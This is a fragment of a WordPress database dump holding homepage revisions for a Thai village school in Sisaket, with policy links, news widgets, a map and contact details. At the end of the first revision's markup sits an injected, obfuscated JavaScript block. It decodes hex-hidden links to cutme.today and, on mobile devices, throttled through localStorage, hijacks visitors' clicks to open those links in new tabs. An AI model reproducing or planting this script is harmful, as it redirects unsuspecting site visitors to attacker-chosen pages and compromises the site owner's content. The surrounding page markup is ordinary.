style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 22:07:15','2024-08-07 15:07:15','',14,'http://pakhaeng.ssk.in.th/?p=678',0,'revision','',0),
(679,1,'2024-08-07 22:07:52','2024-08-07 15:07:52','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 